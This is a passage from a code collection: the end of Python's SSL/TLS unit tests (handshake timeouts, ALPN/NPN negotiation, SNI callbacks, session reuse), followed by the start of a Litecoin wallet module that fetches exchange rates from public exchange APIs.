self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
self.assertTrue(server.server_side)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.recv(1)
t = threading.Thread(target=serve)
t.start()
# Client wait until server setup and perform a connect.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_default_ciphers(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
try:
# Force a set of weak ciphers on our client context
context.set_ciphers("DES")
except ssl.SSLError:
self.skipTest("no DES cipher available")
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_SSLv23,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", str(server.conn_errors[0]))
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1')
self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.load_cert_chain(CERTFILE)
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got channel binding data: {0!r}\n"
.format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
s.close()
# now, again
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got another channel binding data: {0!r}\n"
.format(new_cb_data))
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
s.close()
def test_compression(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.load_dh_params(DHFILE)
context.set_ciphers("kEDH")
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_verify_locations(CERTFILE)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
client_context.load_cert_chain(CERTFILE)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True)
except ssl.SSLError as e:
stats = e
if expected is None and IS_OPENSSL_1_1:
# OpenSSL 1.1.0 raises handshake error
self.assertIsInstance(stats, ssl.SSLError)
else:
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_npn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, 'localhost')
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, 'localhost')
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_shared_ciphers(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
if ssl.OPENSSL_VERSION_INFO >= (1, 0, 2):
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
alg1 = "AES256"
alg2 = "AES-256"
else:
client_context.set_ciphers("AES:3DES")
server_context.set_ciphers("3DES")
alg1 = "3DES"
alg2 = "DES-CBC3"
stats = server_params_test(client_context, server_context)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
if not alg1 in name.split("-") and alg2 not in name:
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket())
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(support.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(support.unlink, support.TESTFN)
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
with open(support.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_session(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
# first connection without session
stats = server_params_test(client_context, server_context)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
if ssl.OPENSSL_VERSION_INFO > (1, 0, 1):
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context, session=session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context, session=session)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
context2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context2.verify_mode = ssl.CERT_REQUIRED
context2.load_verify_locations(CERTFILE)
context2.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with context.wrap_socket(socket.socket()) as s:
# can set session before handshake and before the
# connection was established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with context2.wrap_socket(socket.socket()) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
def test_main(verbose=False):
if support.verbose:
import warnings
plats = {
'Linux': platform.linux_distribution,
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
with warnings.catch_warnings():
warnings.filterwarnings(
'ignore',
r'dist\(\) and linux_distribution\(\) '
'functions are deprecated .*',
PendingDeprecationWarning,
)
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [
ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests,
SimpleBackgroundTests,
]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
if _have_threads:
thread_info = support.threading_setup()
if thread_info:
tests.append(ThreadedTests)
try:
support.run_unittest(*tests)
finally:
if _have_threads:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
exchange_rate.py
|
from datetime import datetime
import inspect
import requests
import sys
import os
import json
from threading import Thread
import time
import csv
import decimal
from decimal import Decimal
from .bitcoin import COIN
from .i18n import _
from .util import PrintError, ThreadJob
# See https://en.wikipedia.org/wiki/ISO_4217
CCY_PRECISIONS = {'BHD': 3, 'BIF': 0, 'BYR': 0, 'CLF': 4, 'CLP': 0,
'CVE': 0, 'DJF': 0, 'GNF': 0, 'IQD': 3, 'ISK': 0,
'JOD': 3, 'JPY': 0, 'KMF': 0, 'KRW': 0, 'KWD': 3,
'LYD': 3, 'MGA': 1, 'MRO': 1, 'OMR': 3, 'PYG': 0,
'RWF': 0, 'TND': 3, 'UGX': 0, 'UYI': 0, 'VND': 0,
'VUV': 0, 'XAF': 0, 'XAU': 4, 'XOF': 0, 'XPF': 0}
class ExchangeBase(PrintError):
def __init__(self, on_quotes, on_history):
self.history = {}
self.quotes = {}
self.on_quotes = on_quotes
self.on_history = on_history
def get_json(self, site, get_string):
# APIs must have https
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electrum'}, timeout=10)
return response.json()
def get_csv(self, site, get_string):
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electrum'})
reader = csv.DictReader(response.content.decode().split('\n'))
return list(reader)
def name(self):
return self.__class__.__name__
def update_safe(self, ccy):
try:
self.print_error("getting fx quotes for", ccy)
self.quotes = self.get_rates(ccy)
self.print_error("received fx quotes")
except BaseException as e:
self.print_error("failed fx quotes:", e)
self.on_quotes()
def update(self, ccy):
t = Thread(target=self.update_safe, args=(ccy,))
t.setDaemon(True)
t.start()
def read_historical_rates(self, ccy, cache_dir):
filename = os.path.join(cache_dir, self.name() + '_'+ ccy)
if os.path.exists(filename):
timestamp = os.stat(filename).st_mtime
try:
with open(filename, 'r', encoding='utf-8') as f:
h = json.loads(f.read())
h['timestamp'] = timestamp
except:
h = None
else:
h = None
if h:
self.history[ccy] = h
self.on_history()
return h
def get_historical_rates_safe(self, ccy, cache_dir):
try:
self.print_error("requesting fx history for", ccy)
h = self.request_history(ccy)
self.print_error("received fx history for", ccy)
except BaseException as e:
self.print_error("failed fx history:", e)
return
filename = os.path.join(cache_dir, self.name() + '_' + ccy)
with open(filename, 'w', encoding='utf-8') as f:
f.write(json.dumps(h))
h['timestamp'] = time.time()
self.history[ccy] = h
self.on_history()
def get_historical_rates(self, ccy, cache_dir):
if ccy not in self.history_ccys():
return
h = self.history.get(ccy)
if h is None:
h = self.read_historical_rates(ccy, cache_dir)
if h is None or h['timestamp'] < time.time() - 24*3600:
t = Thread(target=self.get_historical_rates_safe, args=(ccy, cache_dir))
t.setDaemon(True)
t.start()
def history_ccys(self):
return []
def historical_rate(self, ccy, d_t):
return self.history.get(ccy, {}).get(d_t.strftime('%Y-%m-%d'), 'NaN')
def get_currencies(self):
rates = self.get_rates('')
return sorted([str(a) for (a, b) in rates.items() if b is not None and len(a)==3])
class Bit2C(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.bit2c.co.il', '/Exchanges/LTCNIS/Ticker.json')
return {'NIS': Decimal(json['ll'])}
class BitcoinAverage(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('apiv2.bitcoinaverage.com', '/indices/global/ticker/short')
return dict([(r.replace("LTC", ""), Decimal(json[r]['last']))
for r in json if r != 'timestamp'])
def history_ccys(self):
return ['AUD', 'BRL', 'CAD', 'CHF', 'CNY', 'EUR', 'GBP', 'IDR', 'ILS',
'MXN', 'NOK', 'NZD', 'PLN', 'RON', 'RUB', 'SEK', 'SGD', 'USD',
'ZAR']
def request_history(self, ccy):
history = self.get_csv('apiv2.bitcoinaverage.com',
"/indices/global/history/LTC%s?period=alltime&format=csv" % ccy)
return dict([(h['DateTime'][:10], h['Average'])
for h in history])
class BitcoinVenezuela(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitcoinvenezuela.com', '/')
rates = [(r, json['LTC'][r]) for r in json['LTC']
if json['LTC'][r] is not None] # Giving NULL sometimes
return dict(rates)
def history_ccys(self):
return ['ARS', 'EUR', 'USD', 'VEF']
def request_history(self, ccy):
return self.get_json('api.bitcoinvenezuela.com',
"/historical/index.php?coin=LTC")[ccy +'_LTC']
class Bitfinex(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitfinex.com', '/v1/pubticker/ltcusd')
return {'USD': Decimal(json['last_price'])}
class Bitso(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitso.com', '/v3/ticker/?book=ltc_mxn')
return {'MXN': Decimal(json['payload']['last'])}
class BitStamp(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.bitstamp.net', '/api/v2/ticker/ltcusd/')
return {'USD': Decimal(json['last'])}
class Coinbase(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.coinbase.com',
'/v2/exchange-rates?currency=LTC')
rates = json['data']['rates']
return dict([(k, Decimal(rates[k])) for k in rates])
class CoinSpot(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.coinspot.com.au', '/pubapi/latest')
return {'AUD': Decimal(json['prices']['ltc']['last'])}
class GoCoin(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('x.g0cn.com', '/prices')
ltc_prices = json['prices']['LTC']
return dict([(r, Decimal(ltc_prices[r])) for r in ltc_prices])
class HitBTC(ExchangeBase):
def get_rates(self, ccy):
ccys = ['EUR', 'USD']
json = self.get_json('api.hitbtc.com', '/api/1/public/LTC%s/ticker' % ccy)
result = dict.fromkeys(ccys)
if ccy in ccys:
result[ccy] = Decimal(json['last'])
return result
class Kraken(ExchangeBase):
def get_rates(self, ccy):
dicts = self.get_json('api.kraken.com', '/0/public/AssetPairs')
pairs = [k for k in dicts['result'] if k.startswith('XLTCZ')]
json = self.get_json('api.kraken.com',
'/0/public/Ticker?pair=%s' % ','.join(pairs))
ccys = [p[5:] for p in pairs]
result = dict.fromkeys(ccys)
result[ccy] = Decimal(json['result']['XLTCZ'+ccy]['c'][0])
return result
def history_ccys(self):
return ['EUR', 'USD']
def request_history(self, ccy):
query = '/0/public/OHLC?pair=LTC%s&interval=1440' % ccy
json = self.get_json('api.kraken.com', query)
history = json['result']['XLTCZ'+ccy]
return dict([(time.strftime('%Y-%m-%d', time.localtime(t[0])), t[4])
for t in history])
class OKCoin(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.okcoin.com', '/api/v1/ticker.do?symbol=ltc_usd')
return {'USD': Decimal(json['ticker']['last'])}
class MercadoBitcoin(ExchangeBase):
def get_rates(self,ccy):
json = self.get_json('www.mercadobitcoin.net', '/api/ltc/ticker/')
return {'BRL': Decimal(json['ticker']['last'])}
class TheRockTrading(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.therocktrading.com',
'/v1/funds/LTCEUR/ticker')
return {'EUR': Decimal(json['last'])}
class QuadrigaCX(ExchangeBase):
def get_rates(self,ccy):
json = self.get_json('api.quadrigacx.com', '/v2/ticker?book=ltc_cad')
return {'CAD': Decimal(json['last'])}
class WEX(ExchangeBase):
def get_rates(self, ccy):
json_eur = self.get_json('wex.nz', '/api/3/ticker/ltc_eur')
json_rub = self.get_json('wex.nz', '/api/3/ticker/ltc_rur')
json_usd = self.get_json('wex.nz', '/api/3/ticker/ltc_usd')
return {'EUR': Decimal(json_eur['ltc_eur']['last']),
'RUB': Decimal(json_rub['ltc_rur']['last']),
'USD': Decimal(json_usd['ltc_usd']['last'])}
def dictinvert(d):
inv = {}
for k, vlist in d.items():
for v in vlist:
keys = inv.setdefault(v, [])
keys.append(k)
return inv
def get_exchanges_and_currencies():
import os, json
path = os.path.join(os.path.dirname(__file__), 'currencies.json')
try:
with open(path, 'r', encoding='utf-8') as f:
return json.loads(f.read())
except:
pass
d = {}
is_exchange = lambda obj: (inspect.isclass(obj)
and issubclass(obj, ExchangeBase)
and obj != ExchangeBase)
exchanges = dict(inspect.getmembers(sys.modules[__name__], is_exchange))
for name, klass in exchanges.items():
exchange = klass(None, None)
try:
d[name] = exchange.get_currencies()
print(name, "ok")
except:
print(name, "error")
continue
with open(path, 'w', encoding='utf-8') as f:
f.write(json.dumps(d, indent=4, sort_keys=True))
return d
CURRENCIES = get_exchanges_and_currencies()
def get_exchanges_by_ccy(history=True):
if not history:
return dictinvert(CURRENCIES)
d = {}
exchanges = CURRENCIES.keys()
for name in exchanges:
klass = globals()[name]
exchange = klass(None, None)
d[name] = exchange.history_ccys()
return dictinvert(d)
class FxThread(ThreadJob):
def __init__(self, config, network):
self.config = config
self.network = network
self.ccy = self.get_currency()
self.history_used_spot = False
self.ccy_combo = None
self.hist_checkbox = None
self.cache_dir = os.path.join(config.path, 'cache')
self.set_exchange(self.config_exchange())
if not os.path.exists(self.cache_dir):
os.mkdir(self.cache_dir)
def get_currencies(self, h):
d = get_exchanges_by_ccy(h)
return sorted(d.keys())
def get_exchanges_by_ccy(self, ccy, h):
d = get_exchanges_by_ccy(h)
return d.get(ccy, [])
def ccy_amount_str(self, amount, commas):
